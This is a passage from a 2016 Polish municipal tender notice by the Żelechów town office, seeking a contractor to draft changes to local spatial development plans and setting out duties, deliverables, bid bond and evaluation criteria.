-przygotowania zawiadomienia na piśmie o podjęciu uchwały o przystąpieniu do sporządzania planu zagospodarowania przestrzennego  dla instytucji i organów  właściwych do uzgadniania i opiniowania  projektu planu wraz z wykazem instytucji i organów i ich danymi adresowymi,
-dokonania oceny istniejącego stanu zagospodarowania, charakteru istniejącej zabudowy;
-rozpatrzenia   wniosków  i uwag o których mowa w art. 17 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym i art. 55 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku I jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz. U z 2016 r. poz.353),
-sporządzenia  projektu  w/w miejscowego planu  wraz z prognozą  oddziaływania na środowisko uwzględniając ustalenia zawarte w Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów,
-sporządzenia prognozy skutków finansowych uchwalenia przedmiotowego planu z uwzględnieniem art. 36 uopizp,
-uzyskania od gminnej komisji urbanistyczno-architektonicznej opinii o projekcie miejscowego planu  zagospodarowania przestrzennego oraz uzyskania od wójtów, burmistrzów gmin i prezydenta miasta, graniczących z obszarem objętym planem, w zakresie rozmieszczenia inwestycji celu publicznego o znaczeniu lokalnym,
-przygotowania wystąpień o opinie i uzgodnienia dot. projektu  planu do właściwych  instytucji i organów, przygotowanie wykazu instytucji i organów wraz z  ich danymi adresowymi),
-na etapie opiniowania i uzgadniania projektu planu wykonawca  przekaże projekt dokumentu w ilości i formie niezbędnej do sprawnego przeprowadzenia procedury uzyskania opinii i uzgodnień wynikających z przepisów prawa;
-opracowanie wniosku o zgodę na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne,   w przypadku gdy teren objęty zmianą planu takiej zgody nie posiada.
-wprowadzenia zmian wynikających z uzyskanych opinii i uzgodnień,
-przygotowania  ogłoszenia i obwieszczenia  o wyłożeniu projektu  do publicznego  wglądu wraz z prognozą oddziaływania na środowisko oraz zorganizowania w tym czasie dyskusji publicznej nad przyjętymi  w projekcie planu rozwiązaniami z jednoczesnym określeniem  terminu, w którym osoby prawe i fizyczne  oraz  jednostki  organizacyjne   będą  mogły  wnieść  uwagi do projektu planu. Ustalenie  w/w  terminów  po dokonaniu uzgodnień  z Zamawiającym. Na etapie wyłożenia projektu planu do publicznego wglądu wykonawca  przekaże projekt dokumentu w formie kolorowych wydruków+ 1 egz. w wersji elektronicznej,
-uczestniczenia, przeprowadzenia i pełnej obsługi wyłożenia projektu do publicznego wglądu. Obsługa  wyłożenia  powinna  zapewnić  sprawne  przeprowadzenie tego  etapu  procedury,
-przygotowanie projektu rozpatrzenia uwag po zakończeniu okresu wyłożenia planu,  
-wprowadzenia zmian do projektu planu wynikających z rozpatrzenia uwag a następnie w niezbędnym zakresie ponowienia uzgodnień,
-przygotowania kompletu projektu materiałów planistycznych w ilości 16 kpl. (w wersji papierowej dopuszcza się odpowiednie zmniejszenie rysunku planu do skali zapewniającej  czytelność) celem przekazania Radnym Rady Miejskiej na posiedzenie Komisji opiniujących projekt planu,
-przedstawienia Radzie Miejskiej projektu planu wraz z listą nieuwzględnionych uwag i uzasadnieniem.
-Przygotowania kompletu materiałów dot. uchwalenia projektu planu wraz z uzasadnieniem dla  Burmistrza  w celu   przedstawienia   Radzie Miejskiej .
-udział  w posiedzeniach  Komisji  i Sesjach  Rady Miejskiej oraz innych  spotkaniach, których  konieczność wyniknie w trakcie  procedury. Wykonawca jest zobowiązany do wyjaśnienia rozwiązań dotyczących projektu i zawartych w nim opracowań,
-przygotowanie dokumentacji formalno - prawnej w formie książkowej, obejmującej problematykę wymaganą przez Wojewodę w celu oceny zgodności z prawem,
-wprowadzenie do uchwały zatwierdzającej miejscowy plan zmian wynikających z rozstrzygnięć nadzorczych Wojewody (ewentualnie powtórzenie procedury w wymaganym przez Wojewodę zakresie),
-w przypadku ponowienia procedury - ponowne opracowanie niezbędnych dokumentów i ponowienie niezbędnych czynności, udział w czynnościach niezbędnych do ewentualnego doprowadzenia mpzp do zgodności z przepisami; ;
- sporządzenia wykazu dotyczącego łącznej powierzchni przeznaczenia terenów w uchwalonym miejscowym planie zagospodarowania przestrzennego (ha i %) w rozbiciu na: - powierzchnię miejscowego planu zagospodarowania przestrzennego - ogółem, - powierzchnię: zabudowy ogółem, zabudowy wielorodzinnej, zabudowy usługowej ogółem, usług publicznych, terenów użytkowanych rolniczo ogółem, zabudowy zagrodowej, zabudowy techniczno-produkcyjnej, zieleni i wód, komunikacji, infrastruktury technicznej, łączną powierzchnię terenów, dla których zmieniono przeznaczenie gruntów rolniczych na cele nierolnicze oraz gruntów leśnych na cele nieleśne.
-wszystkie uzgodnienia pomiędzy Wykonawcą, a Zamawiającym dotyczące przedmiotu zamówienia w trakcie jego realizacji , należy dokonywać na piśmie w formie notatki  służbowej.
Nie należy wyceniać kosztów związanych z publikacją ogłoszeń i prowadzoną korespondencją wynikającą z procedury planistycznej.  	
	Opracowanie należy sporządzić w oparciu o ustalenia Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów.
Stopień zgodności przewidywanych rozwiązań planu z ustaleniami studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie Nr LI/367/14 z dnia 30 września 2014r.
	Opracowanie miejscowego planu zagospodarowania przestrzennego dla wskazanych obszarów będzie musiało być poprzedzone sporządzeniem w części zmiany obowiązującego studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie Nr LI/367/14 z dnia 30 września 2014r. W dniu 9 lipca 2015r. Rada Miejska w Żelechowie podjęła  uchwałę Nr VIII/62/2015 w sprawie przystąpienia do sporządzenia zmiany obowiązującego studium.
Obecnie trwa procedura planistyczna zmiany studium. Należy przyjąć, iż obszerny zakres regulacji studium z uwagi na dość ogólną konstrukcję swoich ustaleń pozwala na  zachowanie uniwersalnej zgodności  w stosunku do projektowanych rozwiązań w planie miejscowym - podstawowe przeznaczenie terenu proponowane w projekcie planu miejscowego będzie zgodne z polityką przestrzenną określoną w studium. Ponadto rozwiązania zaproponowane w projekcie planu nie będą naruszały ustaleń studium w zakresie: racjonalnego gospodarowania przestrzenią, ochrony środowiska przyrodniczego, ochrony środowiska kulturowego, rozbudowy i modernizacji systemu transportowo - komunikacyjnego, rozwoju systemów infrastruktury technicznej i komunalnej, itp.
Po uchwaleniu - studium dopuszczać będzie realizację planowanych zamierzeń inwestycyjnych, dlatego też ustalenia  planu miejscowego nie będą naruszać ustaleń studium.	
Dokumentacja zostanie przekazana przez Wykonawcę w następujących ilościach:
-	kompletną uchwałę w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego wraz z załącznikami zawierającymi część tekstową i graficzną w formie papierowej w 6 egzemplarzach ; wydruki części graficznej kolorowe  oraz wersję  elektroniczną na płycie CD - 5 egz.
-	opracowanie ekofizjograficzne ( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	rysunek planu  w kolorze w formie książkowej (1 egz.) zalaminowany, podzielony na sekcje w formacie A3 z zachowaniem skali rysunku planu ;
-	prognoza oddziaływania na środowisko - ( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	prognoza skutków finansowych( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	1  egzemplarz kolorowej planszy rysunku planu pomniejszony do skali 1:5 000 do zawieszenia na ścianie dwustronnie zalaminowany i oprawiony w listwy.

Uchwała powinna być też dodatkowo przekazana w formacie XML-EDAP celem publikacji w Dzienniku Urzędowym Województwa Mazowieckiego.
Dodatkowo w/w dane planistyczne należy opracować w sposób opisany szczegółowo w dokumencie Standardy Zapisu Dokumentów Planistycznych w celu zasilenia aplikacji Rejestr Planów. Standardy Zapisu Dokumentów Planistycznych będą stanowić załącznik do umowy.

Wykonawca przeniesie na Zamawiającego (bez odrębnego wynagrodzenia) własność oryginałów utworów wykonywanych w ramach umowy oraz majątkowych praw autorskich  do nich na następujących polach eksploatacji:
          a) zrealizowanie , w tym również przez osoby trzecie;
b) wykonywanie zależnych praw autorskich , w szczególności zezwolenie na korzystanie utworów zależnych;
c) trwałe lub czasowe zwielokrotnienie utworów techniką drukarską, reprograficzną, zapis magnetycznego oraz techniką cyfrową;
         d) wprowadzanie utworów do obrotu, użyczenie lub najem oryginału albo powielonych egzemplarzy, w szczególności wykorzystanie w trakcie prowadzonych robót   budowlanych  i procedur związanych z ich   przeprowadzaniem;
         e) publiczne wykonywanie, wystawienie, wyświetlenie , odtworzenie oraz publiczne udostępnienie utworów  taki sposób , aby każdy mógł mieć  do niego  dostęp w miejscu i w czasie przez siebie wybranym.
Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną lub wszystkie części..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca pod rygorem ważności oferty wnosi wadium na całość przedmiotu zamówienia
w kwocie 5.000,00 zł, na konto przedstawione na stronie tytułowej s.i.w.z. do upływu terminu składania ofert i dołącza do oferty oryginał lub poświadczoną kopię dokumentu stwierdzającego wniesienie wadium. 
2. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.). (art.45 ust.6 ustawy).
3. Wadium zostanie zwrócone wszystkim oferentom na zasadach określonych w art. 46 ustawy.
4. Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych w art.46 ust.5 ustawy.
5. Wykonawcy którzy nie wnieśli wadium, w tym również na przedłużony okres związania z ofertą zostaną wykluczeni z postępowania (art.24 ust.2 pkt.2 ustawy).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie przedłożonego oświadczenia (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 usługę urbanistyczną podobną do objętej przedmiotem zamówienia. Za usługę urbanistyczną podobną zamawiający uzna: sporządzenie miejscowego planu zagospodarowania przestrzennego dla obszaru o powierzchni minimum 3000 ha.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie przedłożonego oświadczenia (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować minimum jedną osobą posiadającą uprawnienia urbanistyczne zgodnie z ustawą
o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2015 r., poz. 199).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie przedłożonego oświadczenia (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca złoży ofertę według wzoru który jest załącznik nr 1 do SIWZ, dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) zmiana terminu wykonania przedmiotu umowy, gdy:
a) zmiana spowodowana jest okolicznościami leżącymi wyłącznie po stronie
Zamawiającego lub okolicznościami niezależnymi zarówno od Zamawiającego
jak i od Wykonawcy,
b) nastąpi nadzwyczajna zmiana stosunków lub siła wyższa uniemożliwiająca
wykonanie umowy w terminie;
c) wystąpi zmiana przepisów, które mają wpływ na wykonanie umowy.
2) zmiana wynagrodzenia należnego wykonawcy, gdy zmianie uległy przepisy prawne
istotne dla realizacji przedmiotu umowy, powodujące rozszerzenie zakresu opracowań niezbędnych dla realizacji przedmiotu zamówienia i nastąpi konieczność zwiększenia wynagrodzenia za przedmiot zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zelechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Żelechowie, ul. Marszałka Józefa Piłsudskiego 47, 08-430 Żelechów, pok. nr 9 od pon. do pt. w godz. 8.30-15.30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2016 godzina 12:00, miejsce: Urząd Miejski w Żelechowie, ul. Marszałka Józefa Piłsudskiego 47, 08-430 Żelechów, sekretariat Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sporządzenie miejscowego planu zagospodarowania przestrzennego miasta i gminy Żelechów (etap I)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zmian miejscowych  planów zagospodarowania przestrzennego:
-	Miasta Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie nr XIX/131/05 z dnia 15 lutego 2005r. (ogł. Dz. Urzędowy Województwa Mazowieckiego Nr 66, poz.1725 z dnia 29 marca 2005r.);
-	Miasta Żelechów uchwalonego Uchwałą Nr X/64/2015 Rady Miejskiej w Żelechowie z dnia 17 września 2015r. (ogł. Dz. Urz. Woj. Mazowieckiego z dnia 13.11.2015r. poz. 9051).
-	Miasta Żelechów - Rynek z przyległymi ulicami uchwalonym Uchwałą Rady Miejskiej w Żelechowie nr XXXI/250/13 z dnia 18 marca 2013r. (ogł. Dz. Urzędowy Województwa Mazowieckiego z 2013r. poz. 5912 z dnia 27.05.2013r.)  
które stanowią realizację uchwały Nr XX/133/2016 Rady Miejskiej w Żelechowie z dnia 16 czerwca 2016r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miasta Żelechów,

oraz

- Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie nr XIV/93/04 z dnia 7 kwietnia 2004r. (ogł. Dz. Urzędowy Województwa Mazowieckiego Nr 133, poz.3277 z dnia 03 czerwca 2004r.)
- miejscowego planu zagospodarowania przestrzennego dla części obrębów geodezyjnych Stary Goniwilk, Kalinów, Nowy Goniwilk, Piastów, Władysławów w gminie Żelechów uchwalonym uchwałą Rady Miejskiej w Żelechowie nr LII/370/14 z dnia 30 października 2014r. /ogł. Dz. Urz. Woj. Mazowieckiego, poz. 10606 z dnia 24 listopada 2014r./
które stanowią realizację uchwały Nr XX/135/2016 Rady Miejskiej w Żelechowie z dnia 16 czerwca 2016r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego gminy Żelechów.


Zakres zmiany miejscowego planu zagospodarowania przestrzennego, określony uchwałą intencyjną Nr XX/133/2016 obejmuje opracowanie mpzp  dla obszaru fragmentu miasta Żelechów w kierunku południowym od ulicy Długiej. Obszar objęty zmianą  wynosi  ok. 800 ha.

Zakres zmiany miejscowego planu zagospodarowania przestrzennego, określony uchwałą intencyjną Nr XX/135/2016 obejmuje opracowanie mpzp  dla  obrębów geodezyjnych Huta Żelechowska, Zakrzówek, Kotłówka, Janówek, Nowy Kębłów, Stary Kębłów, Stefanów, Sokolniki,  Władysławów w gminie Żelechów.
Obszar objęty zmianą  wynosi  ok. 4351 ha ( w granicach administracyjnych  obrębów geodezyjnych Huta Żelechowska, Zakrzówek, Kotłówka, Janówek, Nowy Kębłów, Stary Kębłów, Stefanów, Sokolniki,  Władysławów w gminie Żelechów).

	Przedmiot zamówienia powinien być wykonany zgodnie z obowiązującymi przepisami ( co do zakresu  i formy  oraz procedury wykonania), z uwzględnieniem wymogów określonych w  ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778) oraz przepisów wykonawczych w tym rozporządzenia  Ministra Infrastruktury z  dnia 26 sierpnia 2003 r. w  sprawie zakresu  projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587) wraz z przeprowadzeniem strategicznej oceny  oddziaływania na środowisko, zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z  2016 r. poz.353).

Plan opracować stosownie do art. 16  w/w ustawy o planowaniu i zagospodarowaniu przestrzennym  na kopiach map zasadniczych albo w przypadku ich braku na mapach katastralnych,  gromadzonych w państwowym  zasobie geodezyjnym i kartograficznym.
Wymagana skala części graficznej planu: zgodnie z obowiązującymi przepisami.
Zamawiający pozyskał w kwietniu 2016 roku mapy ewidencyjne gruntów i budynków w wersji elektronicznej w postaci wektorowej w rozszerzeniu .dxf w skali 1:1000 dla obszaru miasta i gminy Żelechów. Ponadto w lipcu 2017 roku Zamawiający wystąpił do Starosty Powiatu Garwolińskiego z wnioskiem o udostępnienie danych zgromadzonych w rejestrze publicznym dot. map ewidencyjnych w skali 1:2000 w wersji elektronicznej w postaci wektorowej w rozszerzeniu .dxf dla obszaru gminy Żelechów oraz map ewidencyjnych w skali 1:1000 w wersji elektronicznej dla miasta Żelechów.

Wszelkie prace projektowe lub czynności nie opisane niżej, a wynikające z procedur określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz przepisach szczególnych, niezbędne do właściwego i kompleksowego opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.      
W ramach sporządzenia przedmiotu zamówienia Wykonawca uwzględni ewentualne zmiany przepisów prawa i dostosuje do nich opracowania, będące przedmiotem umowy, w ramach zawartej umowy i ceny ofertowej.

	Konieczność zmiany planu wynika z potrzeby uwzględnienia wniosków o zmianę planu, aktualizacji rozwiązań przestrzennych i przeznaczenia terenów dostosowując je do obecnych potrzeb.
 	Zapisy obowiązujących miejscowych planów zagospodarowania przestrzennego, nie obejmują wszystkich obligatoryjnych ustaleń występujących na obszarze objętym planem zgodnie z obowiązującą ustawą, dlatego też podejmowane są działania zmierzające do aktualizacji planów zgodnie z obowiązującą ustawą oraz zgodnie ze zmianami przeznaczenia i zagospodarowania terenów wyznaczonych w studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy Żelechów.

Do projektu planu należy wykonać:
1/opracowanie ekofizjograficzne dla terenu objętego zmianą planu.
2/Opracowanie projektu  planu.
3/Opracowanie prognozy oddziaływania na środowisko zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U z 2016 r. poz. 353) oraz podsumowania i uzasadnienia w ramach przeprowadzenia strategicznej oceny oddziaływania na środowisko, o których mowa w art. 42 i art. 55 ust. 3 w/w ustawy.
4/prognozę skutków finansowych uchwalenia planu.

Wykonawca opracuje i przekaże Zamawiającemu materiały planistyczne oraz materiały projektu planu na poszczególnych etapach opracowania, w ilościach niezbędnych dla prawidłowego przeprowadzenia procedury formalno-prawnej sporządzania planu.

Wykonawca jest zobowiązany do:
- przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się w trakcie opracowania zmiany planu,
-przygotowania ogłoszenia do prasy miejscowej oraz obwieszczenia o podjęciu uchwały  o przystąpieniu do sporządzenia planu zagospodarowania  przestrzennego, określając   formę , miejsce i termin  składania wniosków,
-przygotowania zawiadomienia na piśmie o podjęciu uchwały o przystąpieniu do sporządzania planu zagospodarowania przestrzennego  dla instytucji i organów  właściwych do uzgadniania i opiniowania  projektu planu wraz z wykazem instytucji i organów i ich danymi adresowymi,
-dokonania oceny istniejącego stanu zagospodarowania, charakteru istniejącej zabudowy;
-rozpatrzenia   wniosków  i uwag o których mowa w art. 17 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym i art. 55 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku I jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz. U z 2016 r. poz.353),
-sporządzenia  projektu  w/w miejscowego planu  wraz z prognozą  oddziaływania na środowisko uwzględniając ustalenia zawarte w Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów,
-sporządzenia prognozy skutków finansowych uchwalenia przedmiotowego planu z uwzględnieniem art. 36 uopizp,
-uzyskania od gminnej komisji urbanistyczno-architektonicznej opinii o projekcie miejscowego planu  zagospodarowania przestrzennego oraz uzyskania od wójtów, burmistrzów gmin i prezydenta miasta, graniczących z obszarem objętym planem, w zakresie rozmieszczenia inwestycji celu publicznego o znaczeniu lokalnym,
-przygotowania wystąpień o opinie i uzgodnienia dot. projektu  planu do właściwych  instytucji i organów, przygotowanie wykazu instytucji i organów wraz z  ich danymi adresowymi),
-na etapie opiniowania i uzgadniania projektu planu wykonawca  przekaże projekt dokumentu w ilości i formie niezbędnej do sprawnego przeprowadzenia procedury uzyskania opinii i uzgodnień wynikających z przepisów prawa;
-opracowanie wniosku o zgodę na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne,   w przypadku gdy teren objęty zmianą planu takiej zgody nie posiada.
-wprowadzenia zmian wynikających z uzyskanych opinii i uzgodnień,
-przygotowania  ogłoszenia i obwieszczenia  o wyłożeniu projektu  do publicznego  wglądu wraz z prognozą oddziaływania na środowisko oraz zorganizowania w tym czasie dyskusji publicznej nad przyjętymi  w projekcie planu rozwiązaniami z jednoczesnym określeniem  terminu, w którym osoby prawe i fizyczne  oraz  jednostki  organizacyjne   będą  mogły  wnieść  uwagi do projektu planu. Ustalenie  w/w  terminów  po dokonaniu uzgodnień  z Zamawiającym. Na etapie wyłożenia projektu planu do publicznego wglądu wykonawca  przekaże projekt dokumentu w formie kolorowych wydruków+ 1 egz. w wersji elektronicznej,
